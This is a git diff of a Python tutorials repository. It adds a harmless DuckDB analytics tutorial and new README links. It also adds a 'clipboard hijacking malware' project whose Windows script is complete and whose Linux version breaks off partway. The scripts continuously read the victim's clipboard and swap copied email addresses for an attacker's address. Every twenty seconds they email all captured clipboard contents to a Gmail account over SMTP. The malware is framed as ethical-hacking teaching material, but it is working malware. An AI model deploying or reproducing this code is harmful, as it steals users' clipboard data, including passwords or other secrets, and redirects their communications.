diff --git a/README.md b/README.md
index 81442a70..c298a644 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,13 @@
-![alt text](images/python_logo.ico) 
+<p align="center">
+  <a href="https://codingfleet.com/code-generator/python/?utm_source=github-repo&utm_medium=banner-2">
+    <img src="images/codingfleet-banner-2.png" alt="CodingFleet Code Generator" width="350" height="350">
+  </a><a href="https://codingfleet.com/code-converter/python/?utm_source=github-repo&utm_medium=banner-3">
+    <img src="images/codingfleet-banner-3.png" alt="CodingFleet Code Converter" width="350" height="350">
+  </a>
+</p>
+
+
+
 # Python Code Tutorials
 This is a repository of all the tutorials of [The Python Code](https://www.thepythoncode.com) website.
 ## List of Tutorials
@@ -19,6 +28,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
         - [How to Perform IP Address Spoofing in Python](https://thepythoncode.com/article/make-an-ip-spoofer-in-python-using-scapy). ([code](scapy/ip-spoofer))
         - [How to See Hidden Wi-Fi Networks in Python](https://thepythoncode.com/article/uncovering-hidden-ssids-with-scapy-in-python). ([code](scapy/uncover-hidden-wifis))
         - [Crafting Dummy Packets with Scapy Using Python](https://thepythoncode.com/article/crafting-packets-with-scapy-in-python). ([code](scapy/crafting-packets))
+        - [Building a Honeypot Defense System with Python and Scapy](https://thepythoncode.com/article/python-scapy-honeypot-port-scan-detection-system). ([code](scapy/honeypot-defense-system))
     - [Writing a Keylogger in Python from Scratch](https://www.thepythoncode.com/article/write-a-keylogger-python). ([code](ethical-hacking/keylogger))
     - [Making a Port Scanner using sockets in Python](https://www.thepythoncode.com/article/make-port-scanner-python). ([code](ethical-hacking/port_scanner))
     - [How to Create a Reverse Shell in Python](https://www.thepythoncode.com/article/create-reverse-shell-python). ([code](ethical-hacking/reverse_shell))
@@ -73,6 +83,8 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
     - [How to Perform Reverse DNS Lookups Using Python](https://thepythoncode.com/article/reverse-dns-lookup-with-python). ([code](ethical-hacking/reverse-dns-lookup))
     - [How to Make a Clickjacking Vulnerability Scanner in Python](https://thepythoncode.com/article/make-a-clickjacking-vulnerability-scanner-with-python). ([code](ethical-hacking/clickjacking-scanner))
     - [How to Build a Custom NetCat with Python](https://thepythoncode.com/article/create-a-custom-netcat-in-python). ([code](ethical-hacking/custom-netcat/))
+    - [Building a ClipBoard Hijacking Malware with Python](https://thepythoncode.com/article/build-a-clipboard-hijacking-tool-with-python). ([code](ethical-hacking/clipboard-hijacking-tool))
+    - [How to Build a Website Blocker in Python](https://www.thepythoncode.com/article/build-website-blocker-python). ([code](ethical-hacking/website-blocker))
 
 - ### [Machine Learning](https://www.thepythoncode.com/topic/machine-learning)
     - ### [Natural Language Processing](https://www.thepythoncode.com/topic/nlp)
@@ -96,6 +108,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
         - [Word Error Rate in Python](https://www.thepythoncode.com/article/calculate-word-error-rate-in-python). ([code](machine-learning/nlp/wer-score))
         - [How to Calculate ROUGE Score in Python](https://www.thepythoncode.com/article/calculate-rouge-score-in-python). ([code](machine-learning/nlp/rouge-score))
         - [Visual Question Answering with Transformers](https://www.thepythoncode.com/article/visual-question-answering-with-transformers-in-python). ([code](machine-learning/visual-question-answering))
+        - [Building a Full-Stack RAG Chatbot with FastAPI, OpenAI, and Streamlit](https://thepythoncode.com/article/build-rag-chatbot-fastapi-openai-streamlit). ([code](https://github.com/mahdjourOussama/python-learning/tree/master/chatbot-rag))
     - ### [Computer Vision](https://www.thepythoncode.com/topic/computer-vision)
         - [How to Detect Human Faces in Python using OpenCV](https://www.thepythoncode.com/article/detect-faces-opencv-python). ([code](machine-learning/face_detection))
         - [How to Make an Image Classifier in Python using TensorFlow and Keras](https://www.thepythoncode.com/article/image-classification-keras-python). ([code](machine-learning/image-classifier))
@@ -134,6 +147,8 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
     - [How to Predict Stock Prices in Python using TensorFlow 2 and Keras](https://www.thepythoncode.com/article/stock-price-prediction-in-python-using-tensorflow-2-and-keras). ([code](machine-learning/stock-prediction))
     - [How to Convert Text to Speech in Python](https://www.thepythoncode.com/article/convert-text-to-speech-in-python). ([code](machine-learning/text-to-speech))
     - [How to Perform Voice Gender Recognition using TensorFlow in Python](https://www.thepythoncode.com/article/gender-recognition-by-voice-using-tensorflow-in-python). ([code](https://github.com/x4nth055/gender-recognition-by-voice))
+    - [How to Build a Semantic Search Engine with FAISS and Sentence Transformers in Python](https://www.thepythoncode.com/article/semantic-search-engine-faiss-python). ([code](machine-learning/semantic-search-faiss))
+    - [How to Generate and Visualize Text Embeddings in Python](https://www.thepythoncode.com/article/generate-visualize-text-embeddings-python). ([code](machine-learning/text-embeddings-visualization))
     - [Introduction to Finance and Technical Indicators with Python](https://www.thepythoncode.com/article/introduction-to-finance-and-technical-indicators-with-python). ([code](machine-learning/technical-indicators))
     - [Algorithmic Trading with FXCM Broker in Python](https://www.thepythoncode.com/article/trading-with-fxcm-broker-using-fxcmpy-library-in-python). ([code](machine-learning/trading-with-fxcm))
     - [How to Create Plots With Plotly In Python](https://www.thepythoncode.com/article/creating-dynamic-plots-with-plotly-visualization-tool-in-python). ([code](machine-learning/plotly-visualization))
@@ -178,6 +193,9 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
     - [How to Query the Ethereum Blockchain with Python](https://www.thepythoncode.com/article/query-ethereum-blockchain-with-python). ([code](general/query-ethereum))
     - [Data Cleaning with Pandas in Python](https://www.thepythoncode.com/article/data-cleaning-using-pandas-in-python). ([code](general/data-cleaning-pandas))
     - [How to Minify CSS with Python](https://www.thepythoncode.com/article/minimize-css-files-in-python). ([code](general/minify-css))
+    - [How to Build a File Deduplication Tool in Python](https://www.thepythoncode.com/article/file-deduplication-tool-python). ([code](general/file-deduplication-tool))
+    - [Build a real MCP client and server in Python with FastMCP (Todo Manager example)](https://www.thepythoncode.com/article/fastmcp-mcp-client-server-todo-manager). ([code](general/fastmcp-mcp-client-server-todo-manager))
+    - [How to Automate Excel Reports in Python using Openpyxl](https://www.thepythoncode.com/article/automate-excel-reports-python-openpyxl). ([code](general/sales-report-generator))
 
     
     
@@ -200,6 +218,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
     - [How to Extract Google Trends Data in Python](https://www.thepythoncode.com/article/extract-google-trends-data-in-python). ([code](web-scraping/extract-google-trends-data))
     - [How to Make a YouTube Video Downloader in Python](https://www.thepythoncode.com/article/make-a-youtube-video-downloader-in-python). ([code](web-scraping/youtube-video-downloader))
     - [How to Build a YouTube Audio Downloader in Python](https://www.thepythoncode.com/article/build-a-youtube-mp3-downloader-tkinter-python). ([code](web-scraping/youtube-mp3-downloader))
+    - [YouTube Video Transcription Summarization with Python](https://thepythoncode.com/article/youtube-video-transcription-and-summarization-with-python). ([code](web-scraping/youtube-transcript-summarizer/))
 
 - ### [Python Standard Library](https://www.thepythoncode.com/topic/python-standard-library)
     - [How to Transfer Files in the Network using Sockets in Python](https://www.thepythoncode.com/article/send-receive-files-using-sockets-python). ([code](general/transfer-files/))
@@ -248,6 +267,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
     - [How to Use MySQL Database in Python](https://www.thepythoncode.com/article/using-mysql-database-in-python). ([code](database/mysql-connector))
     - [How to Connect to a Remote MySQL Database in Python](https://www.thepythoncode.com/article/connect-to-a-remote-mysql-server-in-python). ([code](database/connect-to-remote-mysql-server))
     - [How to Use MongoDB Database in Python](https://www.thepythoncode.com/article/introduction-to-mongodb-in-python). ([code](database/mongodb-client))
+    - [SQL Analytics at Lightning Speed: Getting Started with DuckDB in Python](https://www.thepythoncode.com/article/duckdb-python-getting-started). ([code](database/duckdb-python))
 
 - ### [Handling PDF Files](https://www.thepythoncode.com/topic/handling-pdf-files)
     - [How to Extract All PDF Links in Python](https://www.thepythoncode.com/article/extract-pdf-links-with-python). ([code](web-scraping/pdf-url-extractor))
@@ -285,6 +305,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
     - [How to Compress Images in Python](https://www.thepythoncode.com/article/compress-images-in-python). ([code](python-for-multimedia/compress-image))
     - [How to Remove Metadata from an Image in Python](https://thepythoncode.com/article/how-to-clear-image-metadata-in-python). ([code](python-for-multimedia/remove-metadata-from-images))
     - [How to Create Videos from Images in Python](https://thepythoncode.com/article/create-a-video-from-images-opencv-python). ([code](python-for-multimedia/create-video-from-images))
+    - [How to Recover Deleted Files with Python](https://thepythoncode.com/article/how-to-recover-deleted-file-with-python). ([code](python-for-multimedia/recover-deleted-files))
 
 - ### [Web Programming](https://www.thepythoncode.com/topic/web-programming)
     - [Detecting Fraudulent Transactions in a Streaming Application using Kafka in Python](https://www.thepythoncode.com/article/detect-fraudulent-transactions-with-apache-kafka-in-python). ([code](general/detect-fraudulent-transactions))
diff --git a/database/duckdb-python/duckdb_tutorial.py b/database/duckdb-python/duckdb_tutorial.py
new file mode 100644
index 00000000..512aa17a
--- /dev/null
+++ b/database/duckdb-python/duckdb_tutorial.py
@@ -0,0 +1,319 @@
+"""
+DuckDB + Python — Complete Tutorial Code
+=========================================
+SQL Analytics at Lightning Speed with DuckDB
+
+Requirements: pip install duckdb pandas polars pyarrow numpy
+
+This script first generates sample data, then covers (code sections 2-9, in order):
+  1. Basic DuckDB connection and SQL queries
+  2. Querying CSV files directly (no import needed!)
+  3. DuckDB vs Pandas performance comparison
+  4. Querying Parquet files
+  5. Window functions for ranking
+  6. Hybrid workflow: DuckDB → Pandas → Polars
+  7. Persistent databases (.duckdb files)
+  8. Exporting results to CSV and Parquet
+"""
+import duckdb
+import pandas as pd
+import polars as pl
+import numpy as np
+import time
+import os
+
+print(f"DuckDB version: {duckdb.__version__}")
+
+# ═══════════════════════════════════════════════════════════════
+# 1. GENERATE SAMPLE DATA
+# ═══════════════════════════════════════════════════════════════
+print("\n" + "=" * 60)
+print("GENERATING SAMPLE DATA (500K rows)")
+print("=" * 60)
+# Build a synthetic sales table and write it to both CSV and Parquet for the later sections.
+np.random.seed(42)  # fixed seed: the random columns below are reproducible across runs
+n = 500_000  # number of synthetic order rows
+
+regions = ["North", "South", "East", "West"]
+products = ["Widget A", "Widget B", "Gadget X", "Gadget Y", "Doohickey Z"]
+categories = ["Electronics", "Home", "Office", "Electronics", "Office"]  # NOTE(review): duplicates make "Home" half as likely as the others
+
+df_sales = pd.DataFrame({
+    "order_id": range(1, n + 1),
+    "region": np.random.choice(regions, n),
+    "product": np.random.choice(products, n),
+    "category": np.random.choice(categories, n),  # NOTE(review): drawn independently of "product", so one product spans several categories
+    "quantity": np.random.randint(1, 20, n),  # upper bound is exclusive: values are 1..19
+    "unit_price": np.round(np.random.uniform(5, 500, n), 2),
+    "order_date": pd.date_range("2025-01-01", periods=n, freq="90s"),  # one order every 90 seconds
+})
+
+df_sales["total_amount"] = df_sales["quantity"] * df_sales["unit_price"]
+df_sales["customer_id"] = np.random.randint(1000, 5000, n)  # ids 1000..4999, drawn after the columns above
+
+csv_path = "sales_data.csv"  # both paths are relative to the current working directory
+parquet_path = "sales_data.parquet"
+df_sales.to_csv(csv_path, index=False)
+df_sales.to_parquet(parquet_path, index=False)
+
+csv_size = os.path.getsize(csv_path) / (1024 * 1024)  # bytes -> MiB
+pq_size = os.path.getsize(parquet_path) / (1024 * 1024)  # bytes -> MiB
+print(f"CSV saved:  {csv_size:.1f} MB ({n:,} rows)")
+print(f"Parquet saved: {pq_size:.1f} MB ({n:,} rows)")
+
+# ═══════════════════════════════════════════════════════════════
+# 2. BASIC DUCKDB: IN-MEMORY CONNECTION
+# ═══════════════════════════════════════════════════════════════
+print("\n" + "=" * 60)
+print("BASIC DUCKDB: Creating tables & querying")
+print("=" * 60)
+
+conn = duckdb.connect()  # in-memory database; this connection is reused by the later sections
+# Create a small demo table; salary is stored as fixed-point DECIMAL(10, 2).
+conn.execute("""
+    CREATE TABLE employees (
+        id INTEGER,
+        name VARCHAR,
+        department VARCHAR,
+        salary DECIMAL(10, 2)
+    )
+""")
+# Seed the table with seven rows across three departments.
+conn.execute("""
+    INSERT INTO employees VALUES
+    (1, 'Alice', 'Engineering', 95000),
+    (2, 'Bob', 'Engineering', 87000),
+    (3, 'Charlie', 'Marketing', 72000),
+    (4, 'Diana', 'Marketing', 78000),
+    (5, 'Eve', 'Engineering', 105000),
+    (6, 'Frank', 'Sales', 65000),
+    (7, 'Grace', 'Sales', 71000)
+""")
+
+print("\nAll employees (ordered by salary):")
+print(conn.execute("SELECT * FROM employees ORDER BY salary DESC").fetchdf())  # fetchdf() returns the result as a pandas DataFrame
+
+print("\nAverage salary by department:")
+print(conn.execute("""
+    SELECT department,
+           ROUND(AVG(salary), 2) AS avg_salary,
+           COUNT(*) AS headcount
+    FROM employees
+    GROUP BY department
+    ORDER BY avg_salary DESC
+""").fetchdf())
+
+# ═══════════════════════════════════════════════════════════════
+# 3. QUERY CSV DIRECTLY — THE KILLER FEATURE
+# ═══════════════════════════════════════════════════════════════
+print("\n" + "=" * 60)
+print("QUERYING CSV DIRECTLY (No pd.read_csv() needed!)")
+print("=" * 60)
+
+t0 = time.time()
+result = conn.execute(f"""
+    SELECT
+        region,
+        category,
+        COUNT(*) AS num_orders,
+        ROUND(SUM(total_amount), 2) AS revenue,
+        ROUND(AVG(total_amount), 2) AS avg_order_value
+    FROM read_csv('{csv_path}', AUTO_DETECT=TRUE)
+    GROUP BY region, category
+    ORDER BY revenue DESC
+    LIMIT 10
+""").fetchdf()
+duckdb_time = time.time() - t0
+print(f"DuckDB direct CSV query: {duckdb_time:.3f}s")
+print(result)
+
+# ═══════════════════════════════════════════════════════════════
+# 4. DUCKDB vs PANDAS — PERFORMANCE SHOWDOWN
+# ═══════════════════════════════════════════════════════════════
+print("\n" + "=" * 60)
+print("DUCKDB vs PANDAS — Same query, who wins?")
+print("=" * 60)
+
+t0 = time.time()
+df = pd.read_csv(csv_path)
+pandas_result = (df.groupby(["region", "category"])
+                 .agg(
+                     num_orders=("order_id", "count"),
+                     revenue=("total_amount", "sum"),
+                     avg_order_value=("total_amount", "mean")
+                 )
+                 .sort_values("revenue", ascending=False)
+                 .head(10)
+                 .round(2))
+pandas_time = time.time() - t0
+
+print(f"Pandas read_csv + groupby: {pandas_time:.3f}s")
+print(f"DuckDB direct query:        {duckdb_time:.3f}s")
+print(f"Speedup: {pandas_time/duckdb_time:.1f}x faster with DuckDB!")
+
+# ═══════════════════════════════════════════════════════════════
+# 5. QUERY PARQUET FILES
+# ═══════════════════════════════════════════════════════════════
+print("\n" + "=" * 60)
+print("QUERYING PARQUET FILES")
+print("=" * 60)
+
+t0 = time.time()
+result = conn.execute(f"""
+    SELECT
+        product,
+        ROUND(SUM(total_amount), 2) AS total_revenue,
+        COUNT(*) AS units_sold,
+        ROUND(AVG(quantity), 1) AS avg_qty_per_order
+    FROM read_parquet('{parquet_path}')
+    GROUP BY product
+    ORDER BY total_revenue DESC
+""").fetchdf()
+pq_time = time.time() - t0
+print(f"Parquet query: {pq_time:.3f}s")
+print(result)
+
+# ═══════════════════════════════════════════════════════════════
+# 6. WINDOW FUNCTIONS — Top 3 products per region
+# ═══════════════════════════════════════════════════════════════
+print("\n" + "=" * 60)
+print("WINDOW FUNCTIONS — Top 3 Products per Region")
+print("=" * 60)
+# Sum revenue per (region, product), number the rows within each region by revenue, keep rows 1-3.
+result = conn.execute(f"""
+    WITH ranked AS (
+        SELECT
+            region,
+            product,
+            ROUND(SUM(total_amount), 2) AS revenue,
+            ROW_NUMBER() OVER (
+                PARTITION BY region
+                ORDER BY SUM(total_amount) DESC
+            ) AS rank
+        FROM read_parquet('{parquet_path}')
+        GROUP BY region, product
+    )
+    SELECT * FROM ranked WHERE rank <= 3
+    ORDER BY region, rank
+""").fetchdf()
+print(result)  # ROW_NUMBER (not RANK) is used, so tied revenues still get distinct positions
+
+# ═══════════════════════════════════════════════════════════════
+# 7. HYBRID WORKFLOW: DuckDB → Pandas → Polars
+# ═══════════════════════════════════════════════════════════════
+print("\n" + "=" * 60)
+print("HYBRID WORKFLOW: DuckDB → Pandas → Polars")
+print("=" * 60)
+
+# Step 1: DuckDB does the heavy aggregation
+print("Step 1: DuckDB aggregates 500K rows → summary...")
+t0 = time.time()
+summary = conn.execute(f"""
+    SELECT
+        region,
+        category,
+        DATE_TRUNC('month', order_date) AS month,
+        COUNT(*) AS order_count,
+        ROUND(SUM(total_amount), 2) AS monthly_revenue
+    FROM read_parquet('{parquet_path}')
+    GROUP BY region, category, DATE_TRUNC('month', order_date)
+""").fetchdf()
+print(f"   Done in {time.time() - t0:.3f}s → {len(summary)} rows")
+
+# Step 2: Pandas for pivot table
+print("\nStep 2: Pandas pivot table...")
+t0 = time.time()
+pivot = summary.pivot_table(
+    index="month",
+    columns="region",
+    values="monthly_revenue",
+    aggfunc="sum"
+).round(2)
+print(f"   Done in {time.time() - t0:.3f}s")
+print(pivot.head(6))
+
+# Step 3: Polars for final polish
+print("\nStep 3: Polars for final formatting...")
+t0 = time.time()
+pl_df = pl.from_pandas(summary)
+top_month = (pl_df
+             .group_by("region")
+             .agg(pl.col("monthly_revenue").max().alias("best_month_revenue"))
+             .sort("best_month_revenue", descending=True))
+print(f"   Done in {time.time() - t0:.3f}s")
+print(top_month)
+
+# ═══════════════════════════════════════════════════════════════
+# 8. PERSISTENT DATABASE
+# ═══════════════════════════════════════════════════════════════
+print("\n" + "=" * 60)
+print("PERSISTENT DATABASE — Save to .duckdb file")
+print("=" * 60)
+
+db_path = "analytics.duckdb"  # relative to the current working directory
+persistent_conn = duckdb.connect(db_path)  # passing a path (unlike the bare connect() in section 2) backs the database with a file
+# CREATE OR REPLACE keeps the script re-runnable against an existing analytics.duckdb.
+persistent_conn.execute(f"""
+    CREATE OR REPLACE TABLE sales AS
+    SELECT * FROM read_parquet('{parquet_path}')
+""")
+
+row_count = persistent_conn.execute("SELECT COUNT(*) FROM sales").fetchone()[0]  # fetchone() returns a 1-tuple
+db_size = os.path.getsize(db_path) / (1024 * 1024)  # NOTE(review): read while the connection is still open — confirm the file is fully written at this point
+print(f"Database file: {db_path} ({db_size:.1f} MB)")
+print(f"Sales table: {row_count:,} rows persisted")
+
+print("\nTop 5 customers by lifetime value:")
+print(persistent_conn.execute("""
+    SELECT
+        customer_id,
+        COUNT(*) AS orders,
+        ROUND(SUM(total_amount), 2) AS lifetime_value
+    FROM sales
+    GROUP BY customer_id
+    ORDER BY lifetime_value DESC
+    LIMIT 5
+""").fetchdf())
+
+persistent_conn.close()  # not reached if a statement above raises; the in-memory `conn` stays open for section 9
+
+# ═══════════════════════════════════════════════════════════════
+# 9. EXPORT RESULTS
+# ═══════════════════════════════════════════════════════════════
+print("\n" + "=" * 60)
+print("EXPORTING RESULTS")
+print("=" * 60)
+# COPY (query) TO 'file' writes the query result to disk; the same query is exported as CSV, then as Parquet.
+conn.execute(f"""
+    COPY (
+        SELECT region, product, ROUND(SUM(total_amount), 2) AS revenue
+        FROM read_parquet('{parquet_path}')
+        GROUP BY region, product
+        ORDER BY revenue DESC
+    ) TO 'revenue_summary.csv' (HEADER, DELIMITER ',')
+""")
+
+conn.execute(f"""
+    COPY (
+        SELECT region, product, ROUND(SUM(total_amount), 2) AS revenue
+        FROM read_parquet('{parquet_path}')
+        GROUP BY region, product
+        ORDER BY revenue DESC
+    ) TO 'revenue_summary.parquet' (FORMAT PARQUET)
+""")
+
+print("Exported: revenue_summary.csv")
+print("Exported: revenue_summary.parquet")
+
+exported = pd.read_csv("revenue_summary.csv")  # read the CSV back with pandas to check the export
+print(f"\nExported CSV preview ({len(exported)} rows):")
+print(exported.head())
+
+# ═══════════════════════════════════════════════════════════════
+# CLEANUP
+# ═══════════════════════════════════════════════════════════════
+conn.close()  # closes the in-memory connection from section 2; the generated data/export files are left on disk
+
+print("\n" + "=" * 60)
+print("DONE! All examples completed successfully.")
+print("=" * 60)
diff --git a/ethical-hacking/clipboard-hijacking-tool/README.md b/ethical-hacking/clipboard-hijacking-tool/README.md
new file mode 100644
index 00000000..05a3f405
--- /dev/null
+++ b/ethical-hacking/clipboard-hijacking-tool/README.md
@@ -0,0 +1,2 @@
+# [Building a ClipBoard Hijacking Malware with Python](https://thepythoncode.com/article/build-a-clipboard-hijacking-tool-with-python)
+This project demonstrates how to create a clipboard hijacking malware using Python. The malware monitors the clipboard for any changes and replaces the copied content with a predefined message or malicious link.
\ No newline at end of file
diff --git a/ethical-hacking/clipboard-hijacking-tool/clipboard_hijacker.py b/ethical-hacking/clipboard-hijacking-tool/clipboard_hijacker.py
new file mode 100644
index 00000000..0fcbaeb0
--- /dev/null
+++ b/ethical-hacking/clipboard-hijacking-tool/clipboard_hijacker.py
@@ -0,0 +1,211 @@
+"""
+Clipboard Email Hijacker with Email Exfiltration
+Monitors clipboard, hijacks emails, and exfiltrates collected data via email
+"""
+
+import win32clipboard
+import re
+from time import sleep, time
+import sys
+import smtplib
+from email.mime.text import MIMEText
+from email.mime.multipart import MIMEMultipart
+from datetime import datetime
+
+# Configuration
+ATTACKER_EMAIL = "attacker@attack.com"
+EXFILTRATION_EMAIL = "addyours@gmail.com"
+CHECK_INTERVAL = 1  # seconds between clipboard checks
+SEND_INTERVAL = 20  # seconds between sending collected data
+EMAIL_REGEX = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$'
+
+# Gmail SMTP Configuration
+SMTP_SERVER = "smtp.gmail.com"
+SMTP_PORT = 465  # Using SSL port like the working test
+SMTP_USERNAME = "addyours@gmail.com"
+SMTP_PASSWORD = "add yours"
+
+# Data collection storage
+clipboard_data = []
+hijacked_emails = []
+
+def get_clipboard_text():
+    """Safely get text from clipboard"""
+    try:
+        win32clipboard.OpenClipboard()
+        try:
+            data = win32clipboard.GetClipboardData(win32clipboard.CF_TEXT)
+            if data:
+                return data.decode('utf-8').rstrip()
+            return None
+        except TypeError:
+            # Clipboard doesn't contain text
+            return None
+        finally:
+            win32clipboard.CloseClipboard()
+    except Exception as e:
+        return None
+
+def set_clipboard_text(text):
+    """Safely set clipboard text"""
+    try:
+        win32clipboard.OpenClipboard()
+        win32clipboard.EmptyClipboard()
+        win32clipboard.SetClipboardText(text, win32clipboard.CF_TEXT)
+        win32clipboard.CloseClipboard()
+        return True
+    except Exception as e:
+        try:
+            win32clipboard.CloseClipboard()
+        except:
+            pass
+        return False
+
+def send_exfiltration_email(clipboard_data, hijacked_emails):
+    """Send collected clipboard data via email"""
+    
+    if not clipboard_data and not hijacked_emails:
+        print("[*] No data to exfiltrate, skipping email")
+        return False
+    
+    try:
+        # Create email
+        msg = MIMEMultipart()
+        msg['From'] = SMTP_USERNAME
+        msg['To'] = EXFILTRATION_EMAIL
+        msg['Subject'] = f"Clipboard Data Exfiltration - {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}"
+        
+        # Build email body
+        body = "="*60 + "\n"
+        body += "CLIPBOARD DATA EXFILTRATION REPORT\n"
+        body += "="*60 + "\n\n"
+        body += f"Collection Time: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n"
+        body += f"Total Items Collected: {len(clipboard_data)}\n"
+        body += f"Total Emails Hijacked: {len(hijacked_emails)}\n"
+        body += "\n" + "="*60 + "\n"
+        
+        # Clipboard data section
+        if clipboard_data:
+            body += "\n--- CLIPBOARD DATA COLLECTED ---\n"
+            body += "\nAll captured clipboard content (comma-separated):\n"
+            body += ", ".join(clipboard_data)
+            body += "\n\n--- DETAILED CLIPBOARD ENTRIES ---\n"
+            for i, item in enumerate(clipboard_data, 1):
+                body += f"{i}. {item}\n"
+        
+        # Hijacked emails section
+        if hijacked_emails:
+            body += "\n" + "="*60 + "\n"
+            body += "--- HIJACKED EMAIL ADDRESSES ---\n\n"
+            body += "Comma-separated list:\n"
+            body += ", ".join(hijacked_emails)
+            body += "\n\nDetailed list:\n"
+            for i, email in enumerate(hijacked_emails, 1):
+                body += f"{i}. {email}\n"
+        
+        body += "\n" + "="*60 + "\n"
+        body += "End of Report\n"
+        body += "="*60 + "\n"
+        
+        msg.attach(MIMEText(body, 'plain'))
+        
+        # Send email using SMTP_SSL (exactly like the working test email)
+        print(f"\n[*] Sending exfiltration email to {EXFILTRATION_EMAIL}...")
+        with smtplib.SMTP_SSL(SMTP_SERVER, SMTP_PORT) as server:
+            server.login(SMTP_USERNAME, SMTP_PASSWORD)
+            server.send_message(msg)
+        
+        print(f"[+] Successfully sent exfiltration email!")
+        print(f"    - Clipboard items: {len(clipboard_data)}")
+        print(f"    - Hijacked emails: {len(hijacked_emails)}\n")
+        
+        return True
+        
+    except smtplib.SMTPAuthenticationError:
+        print("[ERROR] SMTP Authentication failed!")
+        print("[!] Make sure you're using a Gmail App Password, not your regular password")
+        print("[!] Generate one at: https://myaccount.google.com/apppasswords")
+        return False
+    except Exception as e:
+        print(f"[ERROR] Failed to send email: {e}")
+        import traceback
+        traceback.print_exc()
+        return False
+
+def main():
+    """Main clipboard monitoring loop with periodic exfiltration"""
+    global clipboard_data, hijacked_emails
+    
+    print("="*60)
+    print("Clipboard Email Hijacker with Data Exfiltration")
+    print("="*60)
+    print(f"[+] Target email replacement: {ATTACKER_EMAIL}")
+    print(f"[+] Exfiltration email: {EXFILTRATION_EMAIL}")
+    print(f"[+] Monitoring clipboard every {CHECK_INTERVAL} second(s)")
+    print(f"[+] Sending data every {SEND_INTERVAL} seconds")
+    print("[+] Press Ctrl+C to stop and exit\n")
+    
+    hijack_count = 0
+    last_hijacked = None
+    last_send_time = time()
+    last_clipboard_content = None
+    
+    try:
+        while True:
+            current_time = time()
+            
+            # Get clipboard content
+            data = get_clipboard_text()
+            
+            # Store ALL clipboard content (not just emails)
+            if data and data != last_clipboard_content:
+                clipboard_data.append(data)
+                last_clipboard_content = data
+                print(f"[*] Clipboard captured: {data[:50]}{'...' if len(data) > 50 else ''}")
+            
+            # Check if it's an email and hijack it
+            if data and re.search(EMAIL_REGEX, data):
+                if data != ATTACKER_EMAIL and data != last_hijacked:
+                    print(f"[!] EMAIL DETECTED: {data}")
+                    
+                    # Record the original email before hijacking
+                    hijacked_emails.append(data)
+                    
+                    if set_clipboard_text(ATTACKER_EMAIL):
+                        hijack_count += 1
+                        last_hijacked = data
+                        print(f"[+] REPLACED with: {ATTACKER_EMAIL}")
+                        print(f"[*] Total hijacks: {hijack_count}\n")
+            
+            # Check if it's time to send exfiltration email
+            if current_time - last_send_time >= SEND_INTERVAL:
+                if send_exfiltration_email(clipboard_data, hijacked_emails):
+                    # Clear the data after successful send
+                    clipboard_data = []
+                    hijacked_emails = []
+                    print("[+] Data cleared, starting new collection cycle\n")
+                
+                last_send_time = current_time
+            
+            sleep(CHECK_INTERVAL)
+    
+    except KeyboardInterrupt:
+        print(f"\n\n[+] Ctrl+C detected - Stopping monitoring...")
+        print(f"[*] Total emails hijacked: {hijack_count}")
+        
+        # Send any remaining data before exit
+        if clipboard_data or hijacked_emails:
+            print("\n[*] Sending final exfiltration email with remaining data...")
+            send_exfiltration_email(clipboard_data, hijacked_emails)
+        
+        print("\n[+] Program exited successfully")
+        sys.exit(0)
+        
+    except Exception as e:
+        print(f"\n[ERROR] Unexpected error: {e}")
+        import traceback
+        traceback.print_exc()
+        sys.exit(1)
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/ethical-hacking/clipboard-hijacking-tool/clipboard_hijacker_linux.py b/ethical-hacking/clipboard-hijacking-tool/clipboard_hijacker_linux.py
new file mode 100644
index 00000000..d1c78ab1
--- /dev/null
+++ b/ethical-hacking/clipboard-hijacking-tool/clipboard_hijacker_linux.py
@@ -0,0 +1,251 @@
+"""
+Clipboard Email Hijacker with Email Exfiltration - Linux Version
+"""
+
+import re
+from time import sleep, time
+import sys
+import smtplib
+from email.mime.text import MIMEText
+from email.mime.multipart import MIMEMultipart
+from datetime import datetime
+import subprocess
+import os
+
+# Configuration
+ATTACKER_EMAIL = "attacker@attack.com"
+EXFILTRATION_EMAIL = "ADD YOURS@gmail.com"
+CHECK_INTERVAL = 1  # seconds between clipboard checks
+SEND_INTERVAL = 20  # seconds between sending collected data
+EMAIL_REGEX = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$'
+
+# Gmail SMTP Configuration
+SMTP_SERVER = "smtp.gmail.com"
+SMTP_PORT = 465
+SMTP_USERNAME = "ADD YOURS@gmail.com"
+SMTP_PASSWORD = "ADD Yours"
+
+# Data collection storage
+clipboard_data = []
+hijacked_emails = []
+
+# Detect clipboard tool
+CLIPBOARD_TOOL = None
+if os.system("which xclip > /dev/null 2>&1") == 0:
+    CLIPBOARD_TOOL = "xclip"
+elif os.system("which xsel > /dev/null 2>&1") == 0:
+    CLIPBOARD_TOOL = "xsel"
+elif os.system("which wl-paste > /dev/null 2>&1") == 0:
+    CLIPBOARD_TOOL = "wayland"
+else:
+    print("[ERROR] No clipboard tool found!")
+    print("[!] Install: sudo apt-get install xclip")
+    sys.exit(1)
+
+def get_clipboard_text():
+    """Safely get text from clipboard"""
+    try:
+        if CLIPBOARD_TOOL == "xclip":
+            result = subprocess.run(
+                ["xclip", "-selection", "clipboard", "-o"],
+                capture_output=True,
+                text=True,
+                timeout=2
+            )
+        elif CLIPBOARD_TOOL == "xsel":
+            result = subprocess.run(
+                ["xsel", "--clipboard", "--output"],
+                capture_output=True,
+                text=True,
+                timeout=2
+            )
+        elif CLIPBOARD_TOOL == "wayland":
+            result = subprocess.run(
+                ["wl-paste"],
+                capture_output=True,
+                text=True,
+                timeout=2
+            )
+        else:
+            return None
+        
+        if result.returncode == 0:
+            return result.stdout.rstrip()
+        return None
+    except:
+        return None
+
+def set_clipboard_text(text):
+    """Safely set clipboard text"""
+    try:
